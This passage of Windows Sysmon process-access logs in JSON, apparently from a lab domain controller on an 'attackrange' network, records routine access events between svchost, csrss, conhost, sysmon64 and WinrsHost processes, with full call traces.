RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2485,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:10.172\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:10.172","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2486,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:10.172\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:10.172","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2487,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:10.172\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:10.172","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2488,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:10.172\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:10.172","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2489,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:10.172\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:10.172","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2490,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:10.172\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:10.172","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2491,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:10.172\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01DE-5F25-0000-0010446C0400}\r\nTargetProcessId: 4344\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:10.172","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01DE-5F25-0000-0010446C0400}","TargetProcessId":"4344","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2492,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:10.172\r\nSourceProcessGUID: {A837DB8D-01DE-5F25-0000-0010446C0400}\r\nSourceProcessId: 4344\r\nSourceThreadId: 4364\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-01DE-5F25-0000-0010C46B0400}\r\nTargetProcessId: 4332\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:10.172","SourceProcessGUID":"{A837DB8D-01DE-5F25-0000-0010446C0400}","SourceProcessId":"4344","SourceThreadId":"4364","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-01DE-5F25-0000-0010C46B0400}","TargetProcessId":"4332","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2493,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:10.187\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01DE-5F25-0000-0010C46B0400}\r\nTargetProcessId: 4332\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 